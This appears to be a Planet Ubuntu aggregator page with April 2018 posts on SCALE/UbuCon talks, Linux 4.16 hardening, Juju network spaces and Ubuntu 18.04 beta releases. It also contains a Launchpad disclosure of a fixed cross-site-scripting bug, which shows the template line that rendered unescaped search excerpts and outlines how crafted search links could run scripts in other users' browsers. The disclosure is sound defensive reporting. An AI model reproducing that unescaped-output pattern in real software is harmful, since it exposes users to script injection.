The UbuCon this year wasn’t as big as those in years past, but we did pack the room with nearly 120 people for a few talks, including the one I did on “Keeping Your Ubuntu Systems Secure”. Nathan Haines suggested this topic when I was struggling to come up with a talk idea for the conference. At first I wasn’t sure what I’d say, but as I started taking notes about what I know about Ubuntu both from a systems administration perspective with servers, and as someone who has done a fair amount of user support in the community over the past decade, it turned out that I did have an entire talk worth of advice! None of what I shared was complicated or revolutionary, there was no kernel hardening in my talk or much use of third party security tools. Instead the talk focused on things like keeping your system updated, developing a fundamental understanding of how your system and Debian packages work, and tips around software management. The slides for my presentation are pretty wordy, so you can glean the tips I shared from them: Keeping_Your_Ubuntu_Systems_Secure-UbuConSummit_Scale16x.pdf.


Thanks to Nathan Haines for taking this photo during my talk (source)

The team running Ubuntu efforts at the conference rounded off SCALE by staffing a booth through the weekend. The Ubuntu booths have certainly evolved over the years; when I ran them they were always a bit cluttered and had quite a grassroots feel (the booth in 2012). The booths the team put together now are simpler and more polished. This is definitely in line with the trend of a more polished open source software presence in general, so kudos to the team for making sure our little Ubuntu California crew of volunteers keeps up.

Shifting over to the more work-focused parts of the conference, on Friday I spoke at Container Day, with my talk being the first of the day. The great thing about going first is that I get to complete my talk and relax for the rest of the conference. The less great thing about it is that I get to experience all the A/V gotchas and be awake and ready to give a talk at 9:30AM. Still, I think the pros outweighed the cons and I was able to give a refresh of my “Advanced Continuous Delivery Strategies for Containerized Applications Using DC/OS” talk, which included a new demo that I finished writing the week before. The talk seemed to generate interest that led to good discussions later in the conference, and to my relief the live demo concluded without a problem. Slides from the talk can be found here: Advanced_CD_Using_DCOS-SCALE16x.pdf


Thanks to Nathan Handler for taking this photo during my talk (source)

Saturday and Sunday brought a duo of keynotes that I wouldn’t have expected at an open source conference five years ago, from Microsoft and Amazon. In both these keynotes the speaker recognized the importance of open source today in the industry, which has fueled the shift in perspective and direction regarding open source for these companies. There’s certainly a celebration to be had around this: when companies contribute to open source because it makes business sense to do so, we all benefit from the increased opportunities that presents. On the other hand, it has caused disruption in the older open source communities, and some have struggled to continue to find personal value and meaning in this new open source world. I’ve been thinking a lot about this since the conference and have started putting together a talk about it, nicely timed for the 20th anniversary of the “open source” term. I want to explore how veteran contributors stay passionate and engaged, and how we can bring this same feeling to new contributors who came down different paths to join open source communities.

Regular talks began on Saturday with me attending Nathan Handler’s talk on “Terraforming all the things”, where he shared some of the work they’ve been doing at Yelp that has resulted in things like DNS records and CDN configuration being managed by Terraform. From there I went to a talk by Brian Proffitt where he talked about metrics in communities and the Community Health Analytics Open Source Software (CHAOSS) project. I spent much of the rest of the day in the “hallway track” catching up with people, but at the end I popped into a talk by Steve Wong on “Running Containerized Workloads in an on-prem Datacenter”, where he discussed the role that bare metal continues to have in the industry, even as many rush to the cloud for a turnkey solution.

It was at this talk where I had the pleasure of meeting one of our newest Account Executives at Mesosphere, Kelly Bond, and also had some time to catch up with my colleague Jörg Schad.


Jörg, me, Kelly

Nuritzi Sanchez presented my favorite talk on Sunday, on Endless OS. They build a Linux distribution using Flatpak and, as an organization, work on the problem of access to technology in developing nations. I’ve long been concerned about cellphone-only access in these countries. You need a mix of a system that’s tolerant of being offline and that has input devices (like keyboards!) that allow real work to be done on it. They’re doing really interesting work on the technical side related to offline content and general architecture around a system that needs to be conscious of offline status, but they’re also developing deployment strategies on the ground in places like Indonesia that will ensure the local community can succeed long term. I have a lot of respect for the people working toward all this, and really want to see this organization succeed.

I’m always grateful to participate in this conference. It’s grown a lot over the years and it certainly has changed, but the autonomy given to special events like UbuCon allows for a conference that brings together lots of different voices and perspectives all in one place. I also have a lot of friends who attend this conference, many of whom span jobs and open source projects I’ve worked on over more than a decade. Building friendships and reconnecting with people is part of what makes the work I do in open source so important to me, and not just a job. Thanks to everyone who continues to make this possible year after year in beautiful Pasadena.

More photos from the event here: https://www.flickr.com/photos/pleia2/albums/72157693153653781

on April 13, 2018 08:49 PM

I went to Fukushima

Simon Raffeiner

I'm an engineer and interested in all kinds of technology, especially if it is used to build something big. But I'm also fascinated by what happens when things suddenly change and don't go as expected, and especially by everything that's left behind after technological and social revolutions or disasters. In October 2017 I travelled across Japan and decided to visit one of the places where technology had failed in the worst way imaginable: the Fukushima Evacuation Zone.

The post I went to Fukushima appeared first on LIEBERBIBER.

on April 13, 2018 11:36 AM

Previously: v4.15

Linux kernel v4.16 was released last week. I really should write these posts in advance, otherwise I get distracted by the merge window. Regardless, here are some of the security things I think are interesting:

KPTI on arm64

Will Deacon, Catalin Marinas, and several other folks brought Kernel Page Table Isolation (via CONFIG_UNMAP_KERNEL_AT_EL0) to arm64. While most ARMv8+ CPUs were not vulnerable to the primary Meltdown flaw, the Cortex-A75 does need KPTI to be safe from memory content leaks. It’s worth noting, though, that KPTI does protect other ARMv8+ CPU models from having privileged register contents exposed. So, whatever your threat model, it’s very nice to have this clean isolation between kernel and userspace page tables for all ARMv8+ CPUs.

hardened usercopy whitelisting

While whole-object bounds checking was implemented in CONFIG_HARDENED_USERCOPY already, David Windsor and I finished another part of the porting work of grsecurity’s PAX_USERCOPY protection: usercopy whitelisting. This further tightens the scope of slab allocations that can be copied to/from userspace. Now, instead of allowing all objects in slab memory to be copied, only the whitelisted areas (where a subsystem has specifically marked the memory region allowed) can be copied. For example, only the auxv array out of the larger mm_struct.

As mentioned in the first commit from the series, this reduces the scope of slab memory that could be copied out of the kernel in the face of a bug to under 15%. As can be seen below, one area of remaining work is the kmalloc regions. Those are regularly used for copying things in and out of userspace, but they’re also used for small simple allocations that aren’t meant to be exposed to userspace. Working to separate these kmalloc users needs some careful auditing.

Total Slab Memory:           48074720
Usercopyable Memory:          6367532  13.2%
         task_struct    0.2%         4480/1630720
                 RAW    0.3%          300/96000
               RAWv6    2.1%         1408/64768
    ext4_inode_cache    3.0%       269760/8740224
              dentry   11.1%       585984/5273856
           mm_struct   29.1%        54912/188448
           kmalloc-8  100.0%        24576/24576
          kmalloc-16  100.0%        28672/28672
          kmalloc-32  100.0%        81920/81920
         kmalloc-192  100.0%        96768/96768
         kmalloc-128  100.0%       143360/143360
         names_cache  100.0%       163840/163840
          kmalloc-64  100.0%       167936/167936
         kmalloc-256  100.0%       339968/339968
         kmalloc-512  100.0%       350720/350720
          kmalloc-96  100.0%       455616/455616
        kmalloc-8192  100.0%       655360/655360
        kmalloc-1024  100.0%       812032/812032
        kmalloc-4096  100.0%       819200/819200
        kmalloc-2048  100.0%      1310720/1310720

This series took quite a while to land (you can see David’s original patch date as back in June of last year). Partly this was due to having to spend a lot of time researching the code paths so that each whitelist could be explained for commit logs, partly due to making various adjustments from maintainer feedback, and partly due to the short merge window in v4.15 (when it was originally proposed for merging) combined with some last-minute glitches that made Linus nervous. After baking in linux-next for almost two full development cycles, it finally landed. (Though be sure to disable CONFIG_HARDENED_USERCOPY_FALLBACK to gain enforcement of the whitelists — by default it only warns and falls back to the full-object checking.)

automatic stack-protector

While the stack-protector features of the kernel have existed for quite some time, it has never been enabled by default. This was mainly due to needing to evaluate compiler support for the feature, and Kconfig didn’t have a way to check the compiler features before offering CONFIG_* options. As a defense technology, the stack protector is pretty mature. Having it on by default would have greatly reduced the impact of things like the BlueBorne attack (CVE-2017-1000251), as fewer systems would have lacked the defense.

After spending quite a bit of time fighting with ancient compiler versions (*cough*GCC 4.4.4*cough*), I landed CONFIG_CC_STACKPROTECTOR_AUTO, which is on by default and tries to use the stack protector if it is available. The implementation of the solution, however, did not please Linus, though he allowed it to be merged. In the future, Kconfig will gain the ability to check compiler features itself, which will let the kernel expose the availability of the (now default) stack protector directly in Kconfig, rather than depending on rather ugly Makefile hacks.

That’s it for now; let me know if you think I should add anything! The v4.17 merge window is open. :)

Edit: added details on ARM register leaks, thanks to Daniel Micay.

© 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

on April 13, 2018 12:04 AM

April 12, 2018

S11E06 – Six Feet Over It - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

This week we review the Dell XPS 13 (9370) Developer Edition laptop, bring you some command line lurve and go over all your feedback.

It’s Season 11 Episode 06 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on April 12, 2018 02:15 PM
An old OpenStack network architecture

For the past 5-6 years I’ve been in the business of deploying cloud solutions for our customers. The vast majority of that was some form of OpenStack, either a simple cloud or a complicated one. But when you think about it – what is a simple cloud? It’s easy to say that a small number of machines makes an easy cloud and a large number of machines makes a complicated one. But that is not true. The complexity of a typical IaaS solution is pretty much determined by network complexity. Network, in all shapes and forms, from the underlay network to the customer’s overlay network requirements. I’ll try to explain how we deal with the underlay part in this blog.

It’s not a secret that a traditional tree-like network architecture just doesn’t work for cloud environments. There are multiple reasons why: it doesn’t scale very well, it requires big OSI layer 2 domains and… well, it’s based on OSI layer 2. Debugging issues on that level is never a joyful experience. Therefore, for IaaS environments one really wants a modern design in the form of a spine-leaf architecture. A layer 3 spine-leaf architecture. This allows us to have a bunch of smaller layer 2 domains, which then nicely correlate to availability zones, power zones, etc. However, managing environments with multiple layer 2 and therefore even more layer 3 domains requires a bit of rethinking. If we truly want to be effective in deploying and operating a cloud across multiple different layer 2 domains, we need to think of the network in a slightly more abstract way. Luckily, this is nothing new.

In the traditional approach to networking, we talk about TORs, management fabric, BMC/OOB fabric, etc. These are, most of the time, layer 2 concepts. Fabric, after all, is a collection of switches. But the approach is correct; we should always talk about networks in abstract terms. Instead of talking about subnets and VLANs, we should talk about the purpose of the network. This becomes important when we talk about spine-leaf architecture and multiple different subnets that serve the same purpose. In rack 1, subnet 172.16.1.0/24 is the management network, but in rack 2, the management network is on subnet 192.168.1.0/24, and so on. It’s obvious that it’s much nicer to abstract those subnets into a ‘management network’. Still, nothing new. We do this every day.

So… Why do our tools and applications still require us to use VLANs, subnets and IPs? If we deploy the same application across different racks, why do we have to keep separate configurations for each of the units of the same application? What we really want is to have all of our Keystones listening on the OpenStack Public API network, and not on subnets 192.168.10.0/24, 192.168.20.0/24 and 192.168.30.0/24. We end up thinking about an application on a network, but we configure exact copies of the same application (units) differently on different subnets. Clearly our configuration tools are not doing what we want, but rather forcing us to transform our way of thinking into what those tools need. It’s a paradox: OpenStack is not that complicated, rather it’s made complicated by the tools used to deploy it.

While trying to solve this problem in our deployments at Canonical, we came up with the concept of spaces. A space would be this abstracted network that we have in our heads, but somehow fail to put into our tools. Again, spaces are not a revolutionary concept in networking; they have been in our heads all this time. So, how do we implement spaces at Canonical?

We have grown the concept of spaces across all of our tooling: MAAS, Juju and charms. When we configure MAAS to manage our bare metal machines, we do not define networks as subnets or VLANs; we rather define networks as spaces. A space has a purpose, a description and a few other attributes. VLANs, and indirectly subnets too, become properties of the space, instead of the other way around. This also means that when we deploy a machine, we deploy it connected to a space. When we deploy a machine, we usually do not deploy it on a specific network, but rather with specific requirements: it must be able to talk to X, it must have Y CPU and Z RAM. If you have ever asked yourself why it takes so much time to rack and stack a server, it’s because of this disconnect between what we want and how we handle the configuration.

We’ve also enabled Juju to make this kind of request – it asks MAAS for machines that are connected to a space, or a set of spaces. It then exposes these spaces to charms, so that each charm knows what kind of networks the application has at its disposal. This allows us to do ‘juju deploy keystone --bind public=public-space -n3’: deploy three keystones and connect them to public-space, a space defined in MAAS. Which VLAN that will be, which subnet or IP, we do not care; the charm will get information from Juju about these “low level” terms (VLANs, IPs). We humans do not think of VLANs and subnets and IPs; at best we think in OSI layer 1 terms.

Sounds a bit complicated? Let’s flip it the other way around. What I can do now is define my application as “3 units of keystone, which use internal network for SQL, public network for exposing API, internal network for OpenStack’s internal communication and is also exposed on OAM network for management purposes” and this is precisely how we deploy OpenStack. In fact, the Juju bundle looks like this:

keystone:
  charm: cs:keystone
  num_units: 3
  bindings:
    "": oam-space
    public: public-space
    internal: internal-space
    shared-db: internal-space

Those who follow OpenStack development will notice that something similar has landed in OpenStack recently: routed provider networks. It’s the same concept, solving the same problem. It’s nice to see how Juju uses this out of the box.

Big thanks to the MAAS, Juju, charms and OpenStack communities for doing this. It has allowed us to deploy complex applications with ease, and therefore shifted our focus to the bigger picture: IaaS modeling and some other, new challenges!

on April 12, 2018 04:44 AM

April 11, 2018

Summary

Mohamed Alaa reported that Launchpad’s Bing site search implementation had a cross-site-scripting vulnerability.  This was introduced on 2018-03-29, and fixed on 2018-04-10.  We have not found any evidence of this bug being actively exploited by attackers; the rest of this post is an explanation of the problem for the sake of transparency.

Details

Some time ago, Google announced that they would be discontinuing their Google Site Search product on 2018-04-01.  Since this served as part of the backend for Launchpad’s site search feature (“Search Launchpad” on the front page), we began to look around for a replacement.  We eventually settled on Bing Custom Search, implemented appropriate support in Launchpad, and switched over to it on 2018-03-29.

Unfortunately, we missed one detail.  Google Site Search’s XML API returns excerpts of search results as pre-escaped HTML, using <b> tags to indicate where search terms match.  This makes complete sense given its embedding in XML; it’s hard to see how that API could do otherwise.  The Launchpad integration code accordingly uses TAL code along these lines, using the structure keyword to explicitly indicate that the excerpts in question do not require HTML-escaping (like most good web frameworks, TAL’s default is to escape all variable content, so successful XSS attacks on Launchpad have historically been rare):

<div class="summary" tal:content="structure page/summary" />

However, Bing Custom Search’s JSON API returns excerpts of search results without any HTML escaping.  Again, in the context of the API in question, this makes complete sense as a default behaviour (though a textFormat=HTML switch is available to change this); but, in the absence of appropriate handling, this meant that those excerpts were passed through to the TAL code above without escaping.  As a result, if you could craft search terms that match a portion of an existing page on Launchpad that shows scripting tags (such as a bug about an XSS vulnerability in another piece of software hosted on Launchpad), and convince other people to follow a suitable search link, then you could cause that code to be executed in other users’ browsers.

The fix was, of course, to simply escape the data returned by Bing Custom Search.  Thanks to Mohamed Alaa for their disclosure.
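
As a rough illustration (this is not the actual Launchpad code), the important change is to HTML-escape the excerpt from the JSON API before it ever reaches a template that renders it with the structure keyword. A minimal sketch in Python, with hypothetical function and parameter names:

# Illustrative sketch only, not Launchpad's real implementation: escape search
# excerpts from the Bing Custom Search JSON API before rendering them as HTML.
import html

def make_summary(excerpt, matched_terms):
    # Escape everything that came from the API first...
    summary = html.escape(excerpt)
    # ...then reintroduce only the markup we intend, e.g. bolding matched terms.
    for term in matched_terms:
        escaped = html.escape(term)
        summary = summary.replace(escaped, '<b>%s</b>' % escaped)
    return summary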

on April 11, 2018 08:40 AM

April 10, 2018

A bunch of Kubernetes developers are doing an Ask Me Anything today on Reddit if you’re interested in asking any questions, hope to see you there!

on April 10, 2018 12:00 AM

April 09, 2018

Here is the second issue of This Week in Lubuntu Development. You can read last week's issue here. Changes General We released 18.04 Final Beta this week. You can find the announcement here. The encrypted LVM bug we described last week has been fixed (thanks to Steve Langasek!). We are still working hard to try […]
on April 09, 2018 04:00 PM

April 08, 2018

In just under 3 weeks, Ubuntu 18.04 LTS launches. This exciting new release is a new Long Term Support release and will introduce many Ubuntu users to GNOME Shell and a closer upstream experience. In addition, Ubuntu developers have been working long and hard to ensure that 18.04 is a big, brilliant release that builds a bridge from 16.04 LTS to a better, bigger platform that can be built upon, without becoming unnecessarily boisterous.

As with each Ubuntu release, 18.04 showcases community artwork with bravado. Thanks to the Ubuntu Free Culture Showcase, we have 12 new wallpapers that will ship with the release:

And since this is an LTS, we’re refreshing the example content on the install media. Not only can you test your graphics and audio hardware for compatibility, but with entertaining media as well:

A big congratulations to the winners, and thanks to everyone who submitted a wallpaper, video entry, or song. You’ll find this media on your Ubuntu desktop after you upgrade or install Ubuntu 18.04 LTS on April 26th!

on April 08, 2018 07:00 AM

April 06, 2018

The Ubuntu team is pleased to announce the final beta release of the
Ubuntu 18.04 LTS Desktop, Server, and Cloud products.

Codenamed "Bionic Beaver", 18.04 LTS continues Ubuntu's proud tradition
of integrating the latest and greatest open source technologies into a
high-quality, easy-to-use Linux distribution.  The team has been hard
at work through this cycle, introducing new features and fixing bugs.

This beta release includes images from not only the Ubuntu Desktop,
Server, and Cloud products, but also the Kubuntu, Lubuntu, Ubuntu
Budgie, UbuntuKylin, Ubuntu MATE, Ubuntu Studio, and Xubuntu flavours.

The beta images are known to be reasonably free of showstopper CD
build or installer bugs, while representing a very recent snapshot of
18.04 that should be representative of the features intended to ship
with the final release expected on April 26th, 2018.

Ubuntu, Ubuntu Server, Cloud Images:
  Bionic Final Beta includes updated versions of most of our core set
  of packages, including a current 4.15 kernel, and much more.

  To upgrade to Ubuntu 18.04 Final Beta from Ubuntu 17.10, follow these
  instructions:

  https://help.ubuntu.com/community/BionicUpgrades

  The Ubuntu 18.04 Final Beta images can be downloaded at:

  http://releases.ubuntu.com/18.04/ (Ubuntu and Ubuntu Server on x86)

  This Ubuntu Server image features the next generation Subiquity server
  installer, bringing the comfortable live session and speedy install of the
  Ubuntu Desktop to server users at last.

  This new installer does not support the same set of installation options
  as the previous server installer, so the "debian-installer" image
  continues to be made available in parallel.  For more information about
  the installation options, please see:

  https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes#Ubuntu_Server

  Additional images can be found at the following links:

  http://cloud-images.ubuntu.com/daily/server/bionic/current/ (Cloud Images)
  http://cdimage.ubuntu.com/releases/18.04/beta-2/ (Non-x86, and d-i Server)
  http://cdimage.ubuntu.com/netboot/18.04/ (Netboot)

  As fixes will be included in new images between now and release, any
  daily cloud image from today or later (i.e. a serial of 20180404 or
  higher) should be considered a beta image.  Bugs found should be filed
  against the appropriate packages or, failing that, the cloud-images
  project in Launchpad.

  The full release notes for Ubuntu 18.04 Final Beta can be found at:

  https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes

Kubuntu:
  Kubuntu is the KDE based flavour of Ubuntu. It uses the Plasma desktop
  and includes a wide selection of tools from the KDE project.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/kubuntu/releases/18.04/beta-2/

  More information on Kubuntu Final Beta can be found here:
  https://wiki.ubuntu.com/BionicBeaver/Beta2/Kubuntu

Lubuntu:
  Lubuntu is a flavor of Ubuntu that targets to be lighter, less
  resource hungry and more energy-efficient by using lightweight
  applications and LXDE, The Lightweight X11 Desktop Environment,
  as its default GUI.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/lubuntu/releases/18.04/beta-2/

Ubuntu Budgie:
  Ubuntu Budgie is community developed desktop, integrating Budgie
  Desktop Environment with Ubuntu at its core.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/ubuntu-budgie/releases/18.04/beta-2/

  More information on Ubuntu Budgie Final Beta can be found here:
  https://ubuntubudgie.org/blog/2018/04/03/18-04-beta-2

UbuntuKylin:
  UbuntuKylin is a flavor of Ubuntu that is more suitable for Chinese
  users.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/ubuntukylin/releases/18.04/beta-2/

  More information on UbuntuKylin Final Beta can be found here:
  https://wiki.ubuntu.com/BionicBeaver/Beta2/UbuntuKylin

Ubuntu MATE:
  Ubuntu MATE is a flavor of Ubuntu featuring the MATE desktop
  environment.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/ubuntu-mate/releases/18.04/beta-2/

Ubuntu Studio:
  Ubuntu Studio is a flavor of Ubuntu that provides a full range of
  multimedia content creation applications for each key workflow:
  audio, graphics, video, photography and publishing.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/ubuntustudio/releases/18.04/beta-2/

  More information about Ubuntu Studio Final Beta can be found here:
  https://wiki.ubuntu.com/BionicBeaver/Beta2/UbuntuStudio

Xubuntu:
  Xubuntu is a flavor of Ubuntu that comes with Xfce, which is a stable,
  light and configurable desktop environment.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/xubuntu/releases/18.04/beta-2/

  More information about Xubuntu Final Beta can be found here:
  http://wiki.xubuntu.org/releases/18.04/release-notes

Regular daily images for Ubuntu, and all flavours, can be found at:
  http://cdimage.ubuntu.com

Ubuntu is a full-featured Linux distribution for clients, servers and
clouds, with a fast and easy installation and regular releases.  A
tightly-integrated selection of excellent applications is included,
and an incredible variety of add-on software is just a few clicks
away.

Professional technical support is available from Canonical Limited and
hundreds of other companies around the world.  For more information
about support, visit http://www.ubuntu.com/support

If you would like to help shape Ubuntu, take a look at the list of
ways you can participate at:
http://www.ubuntu.com/community


Your comments, bug reports, patches and suggestions really help us to
improve this and future releases of Ubuntu.   Instructions can be
found at: https://help.ubuntu.com/community/ReportingBugs

You can find out more about Ubuntu and about this beta release on our
website, IRC channel and wiki.

To sign up for future Ubuntu announcements, please subscribe to
Ubuntu's very low volume announcement list at:

  http://lists.ubuntu.com/mailman/listinfo/ubuntu-announce


https://lists.ubuntu.com/archives/ubuntu-announce/2018-April/000230.html

Originally posted to the Ubuntu Release mailing list on Fri Apr 6 06:02:21 UTC 2018 
by Steve Langasek, on behalf of the Ubuntu Release Team
on April 06, 2018 01:07 PM

Yeah baby! You know you want some of what we've got. Come and have a fling with Ubuntu MATE 18.04 Beta 2.

We are preparing Ubuntu MATE 18.04 (Bionic Beaver) for distribution on April 26th, 2018. With this Beta pre-release, you can see what we are trying out in preparation for our next (stable) version.

Ubuntu MATE 18.04 Beta 2

What works?

People tell us that Ubuntu MATE is stable. You may, or may not, agree.

Ubuntu MATE Beta Releases are NOT recommended for:

  • Regular users who are not aware of pre-release issues
  • Anyone who needs a stable system
  • Anyone uncomfortable running a possibly frequently broken system
  • Anyone in a production environment with data or workflows that need to be reliable

Ubuntu MATE Beta Releases are recommended for:

  • Regular users who want to help us test by finding, reporting, and/or fixing bugs
  • Ubuntu MATE, MATE, and GTK+ developers

What changed since the Ubuntu MATE 17.10 final release?

We've been refining Ubuntu MATE since the 17.10 release and making improvements to ensure that Ubuntu MATE offers what our users want today and what they'll need over the life of this LTS release. This is what's changed since 17.10.

MATE Desktop 1.20

As you may have seen, MATE Desktop 1.20 was released in February 2018 and offers some significant improvements:

  • MATE Desktop 1.20 supports HiDPI displays with dynamic detection and scaling.
    • HiDPI hints for Qt applications are also pushed to the environment to improve cross toolkit integration.
    • Toggling HiDPI modes triggers dynamic resize and scale, no log out/in required.
  • Marco now supports DRI3 and Present, if available.
    • Frame rates in games are significantly increased when using Marco.
  • Marco now supports drag to quadrant window tiling, cursor keys can be used to navigate the Alt + Tab switcher and keyboard shortcuts to move windows to another monitor were added.

If your hardware/drivers support DRI3 then Marco compositing is now hardware accelerated. This dramatically improves 3D rendering performance, particularly in games. If your hardware doesn't support DRI3 then Marco will fallback to a software compositor.

You can read the release announcement to discover everything that improved in MATE Desktop 1.20. It is a significant release that also includes a considerable number of bug fixes.

Since 18.04 beta 1 upstream released MATE Desktop 1.20.1 and the following updates have recently landed in Ubuntu MATE:

  • mate-control-center 1.20.2
  • marco 1.20.1
  • mate-desktop 1.20.1
  • atril 1.20.1
  • mate-power-manager 1.20.1
  • mate-panel 1.20.1
  • mate-settings-daemon 1.20.1
  • pluma 1.20.1
  • mate-applets 1.20.1
  • mate-calc 1.20.1
  • libmatekbd 1.20.1
  • caja 1.20.1
  • mate-sensors-applet 1.20.1

These roll up a collection of fixes, many of which Ubuntu MATE was already carrying patch sets for. The most notable change is that Marco is now fully HiDPI aware and windows controls are scaled correctly.

New and updated desktop layouts - new since 18.04 beta 1

I have decided to add a new layout to the collection available in Ubuntu MATE 18.04. It will be called Familiar and is based on the Traditional layout with the menu-bar (Applications, Places, System) replaced by Brisk Menu. It looks like this:

Familiar

Familiar is now the default layout. Traditional will continue to be shipped, unchanged, and will be available via MATE Tweak for those who prefer it.

Since 18.04 beta 1 the Netbook layout has been updated: maximised windows now maximise into the top panel, like the Mutiny layout. Brisk Menu replaces the custom-menu and mate-dock-applet is used for application pinning and launching. When maximising a window this offers some decent space savings.

Since 18.04 beta 1 the Mutiny layout has been tweaked so the launcher icon is the same size as the docked application icons. We heard you, we understand. It's the little things, right?

Global Menu and MATE HUD

Ubuntu MATE Global Menu

The Global Menu integration is much improved. When the Global Menu is added to a panel the application menus are automatically removed from the application window and only presented globally, no additional configuration (as was the case) is required. Likewise removing the Global Menu from a panel will restore menus to their application windows.

Ubuntu MATE HUD

The HUD now has a 250ms (default) timeout, holding Alt any longer won't trigger the HUD. This is consistent with how the HUD in Unity 7 works. We've fixed a number of issues reported by users of Ubuntu MATE 17.10 regarding the HUD swallowing key presses. The HUD is also HiDPI aware now.

Ubuntu MATE Welcome - new since 18.04 beta 1

Welcome and Boutique have been given some love.

  • The software listings in the Boutique have been refreshed, with some applications being removed, many updated and some new additions.
  • Welcome now has snappier animations and transitions

Indicators by default

Ubuntu MATE 18.04 uses Indicators by default in all layouts. These will be familiar to anyone who has used Unity 7 and offer better accessibility support and ease of use over notification area applets. The volume in Indicator Sound can now be overdriven, so it is consistent with the MATE sound preferences. Notification area applets are still supported as a fallback.

Ubuntu MATE HUD

MATE Dock Applet

MATE Dock Applet is used in the Mutiny layout, but anyone can add it to a panel to create custom panel arrangements. The new version adds support for BAMF and icon scrolling.

  • MATE Dock Applet no longer uses its own method of matching icons to applications and instead uses BAMF. What this means for users is that from now on the applet will be a lot better at matching applications and windows to their dock icons.
  • Icon scrolling is useful when the dock has limited space on its panel and will prevent it from expanding over other applets. This addresses an issue reported by several users in Ubuntu MATE 17.10.

Brisk Menu

Brisk Menu Dash Launcher

Many users commented that when using the Mutiny layout the "traditional" menu felt out of place. The Solus Project, the maintainers of Brisk Menu, have added a dash-style launcher at our request. Ubuntu MATE 18.04 includes a patched version of Brisk Menu that includes this new dash launcher. When MATE Tweak is used to enable the Mutiny or Cupertino layout, it now switches on the dash launcher, which enables a full-screen, searchable application launcher. Similarly, switching to the other panel layouts restores the more traditional Brisk Menu.

Since 18.04 beta 1 we have tweaked the style of the session control buttons in Brisk Menu, and those updates will be waiting for you when you install Ubuntu MATE 18.04 Beta 2.

MATE Window Applets

The Mutiny and Netbook layouts now integrate the mate-window-applets. You can see these in action alongside an updated Mutiny layout here:

Mutiny undecorated maximised windows

Minimal Installation

If you follow the Ubuntu news closely you may have heard that 18.04 now has a Minimal Install option. Ubuntu MATE was at the front of the queue to take advantage of this new feature.

Minimal Install

The Minimal Install is a new option presented in the installer that will install just the MATE Desktop, its utilities, its themes and Firefox. All the other applications such as office suite, email client, video player, audio manager, etc. are not installed. If you're interested, here is the complete list of software that will not be present on a minimal install of Ubuntu MATE 18.04

So, who's this aimed at? There are users who like to uninstall the software they do not need or want and build out their own desktop experience. So for those users, a minimal install is a great platform to build on. For those of you interested in creating "kiosk" style devices, such as home brew Steam machines or Kodi boxes, then a minimal install is another useful starting point.

MATE Tweak

MATE Tweak can now toggle the HiDPI mode between auto detection, regular scaling and forced scaling. HiDPI mode changes are dynamically applied. MATE Tweak has a deeper understanding of Brisk Menu and Global Menu capabilities and manages them transparently while switching layouts. Switching layouts is far more reliable now too. We've removed the Interface section from MATE Tweak. Sadly all the features the Interface section tweaked have been dropped from GTK3 so are now redundant.

MATE Tweak

We've added the following changes since 18.04 Beta 1

  • Added support for the modifications to the Netbook layout.
  • Added a button to launch the Font preferences so users with HiDPI displays can fine tune their font DPI.
  • When saving a panel layout the Dock status will be saved too.

Caja

We've landed caja-eiciel and caja-seahorse.

  • caja-eiciel - An extension for Caja to edit access control lists (ACLs) and extended attributes (xattr)
  • caja-seahorse - An extension for Caja which allows encryption and decryption of OpenPGP files using GnuPG

Artwork, Fonts & Emoji

Emoji Picker

We are no longer shipping mate-backgrounds by default. They have served us well, but are looking a little stale now. We have created a new selection of high quality wallpapers comprised of some abstract designs and high resolution photos from unsplash.com. The Ubuntu MATE Plymouth theme (boot logo) is now HiDPI aware. Our friends at Ubuntu Budgie have uploaded a new version of Slick Greeter which now fades in smoothly, rather than the stuttering we saw in Ubuntu MATE 17.10. We've switched to Noto Sans for users of Japanese, Chinese and Korean fonts and glyphs. MATE Desktop 1.20 supports emoji input, so we've added a colour emoji font too.

New since 18.04 beta 1 the xcursor themes have been replaced with new cursors from MATE upstream, that also offer HiDPI support.

Raspberry Pi images

We're planning on releasing Ubuntu MATE images for the Raspberry Pi around the time 18.04.1 is released, which should be sometime in July. It takes about a month to get the Raspberry Pi images built and tested and we simply don't have time to do this in time for the April release of 18.04.

Download Ubuntu MATE 18.04 Beta 2

We've also redesigned the download page so it's even easier to get started.

Download

Known Issues

Here are the known issues.

Ubuntu MATE

  • The Desktop Layout button in Ubuntu MATE Welcome is extremely unreliable.
    • It is best to pretend you haven't seen that button and avoid clicking it. It will break your desktop, I promise.
  • Anyone upgrading from Ubuntu MATE 16.04 or newer may need to use MATE Tweak to reset the panel layout to one of the bundled layouts post upgrade.
    • Migrating panel layouts, particularly those without Indicator support, is hit and miss. Mostly miss.

Ubuntu family issues

This is our list of known bugs that affect all flavours.

You'll also want to check the Ubuntu MATE bug tracker to see what has already been reported. These issues will be addressed in due course.

Feedback

Is there anything you can help with or want to be involved in? Maybe you just want to discuss your experiences or ask the maintainers some questions. Please come and talk to us.

on April 06, 2018 08:15 AM

The second beta of the Bionic Beaver (to become 18.04 LTS) has now been released, and is available for download!

This milestone features images for Kubuntu and other Ubuntu flavours.

Pre-releases of the Bionic Beaver are not encouraged for:

  • Anyone needing a stable system
  • Anyone who is not comfortable running into occasional, even frequent breakage.

They are, however, recommended for:

  • Ubuntu flavour developers
  • Those who want to help in testing, reporting, and fixing bugs as we work towards getting this release ready.

Beta 2 includes some software updates that are ready for broader testing. However, it is quite an early set of images, so you should expect some bugs.


on April 06, 2018 06:13 AM

18.04 Beta Release

Ubuntu Studio

